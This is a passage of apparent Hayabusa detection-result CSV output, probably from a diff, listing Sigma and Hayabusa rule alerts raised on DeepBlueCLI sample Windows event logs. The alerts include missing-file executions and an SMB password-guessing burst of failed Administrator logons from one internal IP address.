06:44:54.195 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-28 06:44:54.195 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-28 13:15:03.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-28 13:15:03.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 
+2016-08-29 23:37:30.711 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-29 23:37:30.711 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-29 23:37:47.253 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-29 23:37:47.253 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 00:26:09.514 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 00:26:09.514 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 00:26:12.129 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 00:26:12.129 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 03:52:06.519 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 03:52:06.519 +09:00,IE10Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 03:52:09.234 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 03:52:09.234 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 18:48:20.558 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 18:48:20.558 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 23:01:04.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 23:01:04.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-31 06:03:24.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-31 06:03:24.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-31 09:11:14.985 +09:00,IE10Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-31 09:11:14.985 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-02 00:54:06.355 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-02 00:54:06.355 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-02 23:08:32.910 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-02 23:08:32.910 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:42:26.373 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:42:26.373 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 06:19:15.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 06:19:15.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 06:35:14.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-04 06:35:15.664 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 06:35:15.664 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 06:37:55.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-04 06:37:55.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-04 22:32:03.952 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 22:32:03.952 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 22:32:29.279 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 22:32:29.279 +09:00,IE10Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-15 11:13:19.927 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-15 11:13:19.927 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-15 23:50:14.730 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-15 23:50:14.730 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-16 05:09:55.941 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-16 05:09:55.941 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-18 07:53:42.819 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-18 07:53:42.819 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-18 07:56:46.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public 
IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-18 07:56:47.728 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-18 07:56:47.728 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-18 08:03:40.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-18 08:03:40.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-19 23:56:52.427 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 23:56:52.427 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 23:57:15.380 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 23:57:15.380 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 00:13:04.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public 
IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-20 00:13:05.415 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 00:13:05.415 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 00:15:08.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-20 00:15:08.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-20 01:50:06.477 +09:00,DESKTOP-M5SN04R,4625,informational,Logon Failure - Username does not exist,User: JcDfcZTc : Type: 3 : Workstation: 6hgtmVlrrFuWtO65 : IP Address: 192.168.198.149 : SubStatus: 0xc0000064 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gC4ymsKbxVGScMgY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.513 +09:00,-,-,medium,Password Guessing Attack,[condition] count() by IpAddress >= 5 in timeframe [result] count:3558 IpAddress:192.168.198.149 
timeframe:5m,rules/hayabusa/default/alerts/Security/4625_BruteForce_PasswordGuessingDetect.yml,- +2016-09-20 01:50:06.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f2q1tdAUlxHGfGH6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3EPNzcwy7tOAADWx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AbwsMP10Rs4h1Wl1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EEcdqcpqsxQ4RgPx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ngdtRwzXXhAlRxGY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: BbCFZw5qQgU7rQ9W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SXr7lA3MkV6xK36f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.909 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tVFs1kR0AuOutnuI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PkeEabFrDLsBVcXi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GH7dTevmTKZo46Tq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l2E8JmrfaCj5AjSF : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.091 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N4FLUvawWPVqdLaD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KN0EeUzxSZy5l7J4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.169 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l8FjH0QHqromIYWf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fhlF37S1wNupiX5O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.262 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j19XhmSXK526I8kf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:07.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IRcppJXDNNfKuvdc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.343 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E0FoGAIAK2FV3zCJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uYWIk76XIksgN3sE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3FEop7o3SOolNvKs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cMGEM3ql9uov7zCP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EFPUA4pUPaLrkr1I : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.551 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b7IeJU89jxitz407 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.590 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wqj9nXRaDpwCJZO3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.631 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bl0d61v2Ux7cNv4r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.663 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8LxTa5lyutrIB2cd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LPCy11e3YxcCloSH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:07.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mj07WKc4aQqPC0Te : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T2M3v4TsQul5R4sj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I67uBcH52tgLzhVB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.835 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2hsth68FDJ4F10H6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aDoHrfWlaWZ5GbWV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uliC5Wd7uZR3fIBc : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Unknown Reason,User: Administrator : Type: 3 : Workstation: Xhg4hg4XDFaXsJRe : IP Address: 192.168.198.149 : SubStatus: 0xc0000072 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Unknown Reason,User: Administrator : Type: 3 : Workstation: ZrSGxwUyV6gCUPeb : IP Address: 192.168.198.149 : SubStatus: 0xc0000072 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.179 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XUBgTr05x3djEYdM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.219 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 40PhGU4ZXu7uihop : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.335 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1DJ9r72hXZH9rEkb : IP Address: 192.168.198.149 : AuthPackage: 
